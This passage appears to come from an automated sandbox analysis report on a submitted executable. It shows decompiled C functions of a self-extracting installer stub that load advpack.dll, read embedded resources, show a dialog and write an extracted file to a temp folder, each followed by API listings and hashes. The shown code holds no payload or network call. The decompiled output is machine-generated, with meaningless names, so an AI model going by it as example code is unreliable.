                                                                                                                                                                                                      				_t26 = "advpack.dll";
                                                                                                                                                                                                      				E003E658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                      				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                      					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x003e6495
                                                                                                                                                                                                      0x003e6495
                                                                                                                                                                                                      0x003e64a0
                                                                                                                                                                                                      0x003e64a7
                                                                                                                                                                                                      0x003e64ab
                                                                                                                                                                                                      0x003e64bd
                                                                                                                                                                                                      0x003e64c2
                                                                                                                                                                                                      0x003e64d3
                                                                                                                                                                                                      0x003e64df
                                                                                                                                                                                                      0x003e64e8
                                                                                                                                                                                                      0x003e6502
                                                                                                                                                                                                      0x003e64ee
                                                                                                                                                                                                      0x003e64f9
                                                                                                                                                                                                      0x003e64f9
                                                                                                                                                                                                      0x003e6516

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003E64DF
                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003E64F9
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003E6502
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                      • API String ID: 438848745-1655358546
                                                                                                                                                                                                      • Opcode ID: f0aece4b4ed8d727e5be5a1e8b28bfbad66261fa5b39565b45626d29faaed4fa
                                                                                                                                                                                                      • Instruction ID: 99639795895808fc00c286c6ba577af4e67db6b462750ea0f8048f616bece595
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0aece4b4ed8d727e5be5a1e8b28bfbad66261fa5b39565b45626d29faaed4fa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E601F930A00198ABD761EB66DC8AFEE737CDB61311F500395F585961C0DFB0AE85CB51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 32%
                                                                                                                                                                                                      			E003E4169(void* __eflags) {
                                                                                                                                                                                                      				int _t18;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = E003E468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                      				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                                                                      					if(E003E468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							return LocalFree(_t21);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(0x40);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t21);
                                                                                                                                                                                                      						_t18 = 0x3e9;
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						E003E44B9(0, _t18);
                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_t18 = 0x4b1;
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      0x003e417d
                                                                                                                                                                                                      0x003e418f
                                                                                                                                                                                                      0x003e4193
                                                                                                                                                                                                      0x003e41b7
                                                                                                                                                                                                      0x003e41d3
                                                                                                                                                                                                      0x003e41e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e41e7
                                                                                                                                                                                                      0x003e41d5
                                                                                                                                                                                                      0x003e41d6
                                                                                                                                                                                                      0x003e41d8
                                                                                                                                                                                                      0x003e41d9
                                                                                                                                                                                                      0x003e41da
                                                                                                                                                                                                      0x003e41df
                                                                                                                                                                                                      0x003e41e1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e41e1
                                                                                                                                                                                                      0x003e41b9
                                                                                                                                                                                                      0x003e41ba
                                                                                                                                                                                                      0x003e41bc
                                                                                                                                                                                                      0x003e41bd
                                                                                                                                                                                                      0x003e41be
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e41be
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,003E30B4), ref: 003E4189
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,003E30B4), ref: 003E41E7
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$FINISHMSG
                                                                                                                                                                                                      • API String ID: 3507850446-3091758298
                                                                                                                                                                                                      • Opcode ID: bcbfab46e3c2a7cbd1f64b7df9aa21491c9d4115a09871d6b4cd5ca671d10841
                                                                                                                                                                                                      • Instruction ID: 89b816712337410a652e2d4d694ff0e026352d5045988da2be5aa30ed0a0d7f8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcbfab46e3c2a7cbd1f64b7df9aa21491c9d4115a09871d6b4cd5ca671d10841
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F01D1B53002B47BFB271A678C86FBB218EDBDC795F014325B705E95C09AB8DC414175
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E7155() {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct _FILETIME _v16;
                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                      				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                      				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                      				_t23 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                      					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                      					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                      					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                      					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                      					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                      					_t39 = _t36;
                                                                                                                                                                                                      					if(_t36 == 0xbb40e64e || ( *0x3e8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                      						_t36 = 0xbb40e64f;
                                                                                                                                                                                                      						_t39 = 0xbb40e64f;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0x3e8004 = _t39;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t37 =  !_t36;
                                                                                                                                                                                                      				 *0x3e8008 = _t37;
                                                                                                                                                                                                      				return _t37;
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x003e715d
                                                                                                                                                                                                      0x003e7161
                                                                                                                                                                                                      0x003e7165
                                                                                                                                                                                                      0x003e7178
                                                                                                                                                                                                      0x003e7182
                                                                                                                                                                                                      0x003e718e
                                                                                                                                                                                                      0x003e7197
                                                                                                                                                                                                      0x003e71a0
                                                                                                                                                                                                      0x003e71b1
                                                                                                                                                                                                      0x003e71b8
                                                                                                                                                                                                      0x003e71c4
                                                                                                                                                                                                      0x003e71c7
                                                                                                                                                                                                      0x003e71cb
                                                                                                                                                                                                      0x003e71d5
                                                                                                                                                                                                      0x003e71da
                                                                                                                                                                                                      0x003e71da
                                                                                                                                                                                                      0x003e71dc
                                                                                                                                                                                                      0x003e71dc
                                                                                                                                                                                                      0x003e71e2
                                                                                                                                                                                                      0x003e71e5
                                                                                                                                                                                                      0x003e71ee

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003E7182
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 003E7191
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 003E719A
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 003E71A3
                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 003E71B8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                      • Opcode ID: fcca34895efc590a2f126a15203552fc7d626c260094b1255e8664b7c013e74d
                                                                                                                                                                                                      • Instruction ID: fccdb995e60cd35e2682861002ab31a95581e17f325b89ac1d1561aaa9cd90ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcca34895efc590a2f126a15203552fc7d626c260094b1255e8664b7c013e74d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72115171D05648EFCB21DFB8DA8869EB7F8FF48311F514A55E405EB290DB309E048B41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E003E19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v520;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t27 = __ebx;
                                                                                                                                                                                                      				_t11 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                      				_t34 = _a4;
                                                                                                                                                                                                      				_t14 = _a8 - 0x110;
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					_t32 = GetDesktopWindow();
                                                                                                                                                                                                      					E003E43D0(_t34, _t15);
                                                                                                                                                                                                      					_v520 = 0;
                                                                                                                                                                                                      					LoadStringA( *0x3e9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                      					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                      					MessageBeep(0xffffffff);
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if(_t14 != 1) {
                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t32 = _a12;
                                                                                                                                                                                                      						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							EndDialog(_t34, _t32);
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							_t23 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x003e19e0
                                                                                                                                                                                                      0x003e19e0
                                                                                                                                                                                                      0x003e19eb
                                                                                                                                                                                                      0x003e19f2
                                                                                                                                                                                                      0x003e19f9
                                                                                                                                                                                                      0x003e19fc
                                                                                                                                                                                                      0x003e1a01
                                                                                                                                                                                                      0x003e1a2a
                                                                                                                                                                                                      0x003e1a2e
                                                                                                                                                                                                      0x003e1a3e
                                                                                                                                                                                                      0x003e1a4f
                                                                                                                                                                                                      0x003e1a62
                                                                                                                                                                                                      0x003e1a6a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1a03
                                                                                                                                                                                                      0x003e1a06
                                                                                                                                                                                                      0x003e1a20
                                                                                                                                                                                                      0x003e1a20
                                                                                                                                                                                                      0x003e1a08
                                                                                                                                                                                                      0x003e1a08
                                                                                                                                                                                                      0x003e1a14
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1a16
                                                                                                                                                                                                      0x003e1a18
                                                                                                                                                                                                      0x003e1a70
                                                                                                                                                                                                      0x003e1a72
                                                                                                                                                                                                      0x003e1a72
                                                                                                                                                                                                      0x003e1a14
                                                                                                                                                                                                      0x003e1a06
                                                                                                                                                                                                      0x003e1a81

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 003E1A18
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003E1A24
                                                                                                                                                                                                      • LoadStringA.USER32(?,?,00000200), ref: 003E1A4F
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 003E1A62
                                                                                                                                                                                                      • MessageBeep.USER32(000000FF), ref: 003E1A6A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1273765764-0
                                                                                                                                                                                                      • Opcode ID: 45767a7d410342790929b150cfe5fb666f8699832f78d3381b35b8935800f814
                                                                                                                                                                                                      • Instruction ID: 6ec4a767b054a3ee3b7ad774a9af41407b28cb22d089a302376446464cedc646
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45767a7d410342790929b150cfe5fb666f8699832f78d3381b35b8935800f814
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F11E1315001A9AFCB22EF64DE48ABE77BCEF09300F108364F9129A1D0CA30AE10CB91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                                      			E003E63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				long _v272;
                                                                                                                                                                                                      				void* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                      				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_v276 = _a16;
                                                                                                                                                                                                      				_t37 = 1;
                                                                                                                                                                                                      				E003E1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                      				E003E658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                      				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                      					_t28 = _a4;
                                                                                                                                                                                                      					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                      						 *0x3e9124 = 0x80070052;
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					CloseHandle(_t39);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					 *0x3e9124 = 0x80070052;
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                      			}















                                                                                                                                                                                                      0x003e63cb
                                                                                                                                                                                                      0x003e63d2
                                                                                                                                                                                                      0x003e63d8
                                                                                                                                                                                                      0x003e63ea
                                                                                                                                                                                                      0x003e63f3
                                                                                                                                                                                                      0x003e6401
                                                                                                                                                                                                      0x003e6402
                                                                                                                                                                                                      0x003e6410
                                                                                                                                                                                                      0x003e6415
                                                                                                                                                                                                      0x003e6433
                                                                                                                                                                                                      0x003e6438
                                                                                                                                                                                                      0x003e6449
                                                                                                                                                                                                      0x003e6463
                                                                                                                                                                                                      0x003e646d
                                                                                                                                                                                                      0x003e6477
                                                                                                                                                                                                      0x003e6477
                                                                                                                                                                                                      0x003e647a
                                                                                                                                                                                                      0x003e643a
                                                                                                                                                                                                      0x003e643a
                                                                                                                                                                                                      0x003e6444
                                                                                                                                                                                                      0x003e6444
                                                                                                                                                                                                      0x003e6492

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003E642D
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003E645B
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003E647A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003E63EB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                      • API String ID: 1065093856-2356899610
                                                                                                                                                                                                      • Opcode ID: 53ac05ddb711f1ad57522c1f7041f70bd847ed85beffd128f735b461078028d7
                                                                                                                                                                                                      • Instruction ID: 12f71d16ad516155eb9fd923a9925487b9d103bc5993f4c25c2eeb545e040462
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53ac05ddb711f1ad57522c1f7041f70bd847ed85beffd128f735b461078028d7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4221F371A0026CABC722DF26DCC6FEA736CEB54350F000369F584AB2C0CAB06D848F60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				intOrPtr _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				intOrPtr* _t22;
                                                                                                                                                                                                      				void _t24;
                                                                                                                                                                                                      				struct HWND__* _t25;
                                                                                                                                                                                                      				struct HWND__* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				intOrPtr* _t28;
                                                                                                                                                                                                      				intOrPtr* _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                      				if(_t34 != 0) {
                                                                                                                                                                                                      					_t22 = _t33;
                                                                                                                                                                                                      					_t27 = _t22 + 1;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t6 =  *_t22;
                                                                                                                                                                                                      						_t22 = _t22 + 1;
                                                                                                                                                                                                      					} while (_t6 != 0);
                                                                                                                                                                                                      					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                      					 *_t34 = _t24;
                                                                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                                                                      						_t28 = _t33;
                                                                                                                                                                                                      						_t19 = _t28 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t9 =  *_t28;
                                                                                                                                                                                                      							_t28 = _t28 + 1;
                                                                                                                                                                                                      						} while (_t9 != 0);
                                                                                                                                                                                                      						E003E1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                      						_t11 =  *0x3e91e0; // 0x2c77cb0
                                                                                                                                                                                                      						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                      						 *0x3e91e0 = _t34;
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t25 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      					E003E44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					LocalFree(_t34);
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      				E003E44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}















                                                                                                                                                                                                      0x003e47e8
                                                                                                                                                                                                      0x003e47f0
                                                                                                                                                                                                      0x003e47f4
                                                                                                                                                                                                      0x003e480f
                                                                                                                                                                                                      0x003e4811
                                                                                                                                                                                                      0x003e4814
                                                                                                                                                                                                      0x003e4814
                                                                                                                                                                                                      0x003e4816
                                                                                                                                                                                                      0x003e4817
                                                                                                                                                                                                      0x003e4829
                                                                                                                                                                                                      0x003e482b
                                                                                                                                                                                                      0x003e482f
                                                                                                                                                                                                      0x003e484f
                                                                                                                                                                                                      0x003e4852
                                                                                                                                                                                                      0x003e4855
                                                                                                                                                                                                      0x003e4855
                                                                                                                                                                                                      0x003e4857
                                                                                                                                                                                                      0x003e4858
                                                                                                                                                                                                      0x003e4860
                                                                                                                                                                                                      0x003e4865
                                                                                                                                                                                                      0x003e486a
                                                                                                                                                                                                      0x003e486f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4876
                                                                                                                                                                                                      0x003e4831
                                                                                                                                                                                                      0x003e4841
                                                                                                                                                                                                      0x003e4847
                                                                                                                                                                                                      0x003e480b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e480b
                                                                                                                                                                                                      0x003e47f6
                                                                                                                                                                                                      0x003e4806
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,003E4E6F), ref: 003E47EA
